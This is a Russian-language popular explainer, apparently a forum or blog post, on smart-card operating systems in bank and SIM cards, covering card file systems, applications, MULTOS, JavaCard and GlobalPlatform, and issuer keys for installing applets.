Давайте вообще вспомним, что такое операционная система и зачем она вообще нужна. Строго говоря, граница между операционной системой и прикладными программами довольно зыбкая, что на компьютере, что в смартфоне, что в пластиковой карте. Смысл операционной системы в том, чтобы предоставить универсальный и удобный механизм доступа к ресурсам устройства. Например, чтобы включить светодиодный индикатор на смартфоне, надо отправить определенную последовательность бит устройству, которое подключено к центральному процессору. Надо знать и последовательность бит (код команды) и адрес, по которому это внешнее устройство доступно процессору. В общем, надо очень много технических деталей знать. Каждый раз писать все это в каждой программе - очень трудно. Поэтому и разрабатывается операционная система, которая сама знает, какие биты и куда послать, чтобы включить светодиод. А программа, которая хочет это сделать - просто вызывает функцию операционной системы, не вдаваясь в эти детали. Это предельно упрощенное понимание, у реальных операционных систем многкратно больше всяких функций, ну да нам сойдет пока такая картинка.

В общем, на вашей чиповой банковской карте, как и на вашей сим-карте в телефоне есть своя операционная система. (А оба чипа отвечают некоей общей спецификации, т.е. SIM-карта устроена примерно так же, ну разве что, часто содержит больше ресурсов). Кроме этого, и в банковской карте, и в SIM-карте даже есть своя файловая система! И внутри этой файловой системы даже есть папки и отдельные файлы :) И в карту устанавливаются отдельные приложения! И когда вы вставляете в терминал (банкомат) свою карту, терминал выбирает приложение, с которым может взаимодействовать - и это приложение внутри карты работает, взаимодействует с терминалом и с внутренними ресурсами карты. Как видите, там целая жизнь происходит :)

Я чуть выше сказал, что каждый производитель пишет операционную систему так, как ему заблагорассудится. Это верно, но лишь отчасти. Есть и некоторые рамочные спецификации; например, независимо от того, какая операционная система там установлена, карта должна взаимодействовать с внешним миром (терминалом, банкоматом) по определенному протоколу. Кроме того, чтобы взаимодействовать, например, с международной платежной системой, на карте должно быть установлено приложение, которое соответствует спецификации этой платежной системы. А это приложение еще кто-то должен написать и сертифицировать в платежной системе.

Поэтому, хоть операционные системы и разные, но они имеют множество общих черт, поскольку решают похожие задачи.

Правда, есть и другой подход, когда операционная система вроде бы универсальная, и программа (приложение), разработанная для одного чипа, в теории может запуститься на другом чипе. Это т.н. Много Прикладные Операционные Системы (МПОС). Т.е. производитель чипа пишет операционную систему таким образом, чтобы она работала на конкретно этом оборудовании и умела с ним взаимодействовать, но снаружи (со стороны программных интерфейсов) выглядела точно так же, как и операционные системы других чипов с этой операционной системой.

По большому счету, широко распространены только две такие системы: MULTOS и JavaCard OS. А еще есть некоммерческая спецификация Global Platform, которую развивают участники рынка (платежные системы, производители чипов, терминалов и т.п.). Реально полностью этой спецификации соответсвует только JavaCard, но все остальные операционные системы (даже не многоприкладные) развиваются с оглядкой на эту спецификацию и в той или иной мере частично ей соответствуют.

Приложения для MultOS пишутся на трех языках - Си, Java и свой специальный язык (уже заточенный, а потому более эффективный) MULTOS Executable Language (MEL).

Для JavaCard, как не трудно догадаться, все приложения пишутся на Java.

Обычно JavaCard-карты содержат наибольшее количество ресурсов (мощнее процессор, больше памяти и т.п.), и потому самые дорогие среди прочих. Это та самая причина, почему существуют другие операционные системы и более дешевые чипы. Но надо понимать, что использование Java имеет и свои преимущества. Кстати, SIM-карта в вашем телефоне с очень высокой вероятностью является JavaCard.

В операционной системе есть и свои системные приложения, которые обеспечивают выполнение некоторых системных функций карты.

Чтобы установить новое приложение на чип, надо иметь специальный секретный ключ. Этот ключ есть у того, кто выпустил карту (у вашего банка или сотового оператора). Без этого ключа ничего не выйдет. Вообще, карта - очень защищенная штука, нет ни одного мгновения в ее жизни, когда она не была бы защищена хоть каким-то секретным ключом. Поэтому можете не волноваться: ничего лишнего на вашей карте оказаться не может.

Рынок приложений для смарт-карт довольно узкий, в силу того, что нет широкого спроса на разнообразые программы :) Потому производители карточных приложений в прессе не гремят. Более того, даже крупные компании, разрабатывающие системы для банковских процессингов, обычно сами не пишут приложения для карт, а берут уже готовые.
 
Назад
Сверху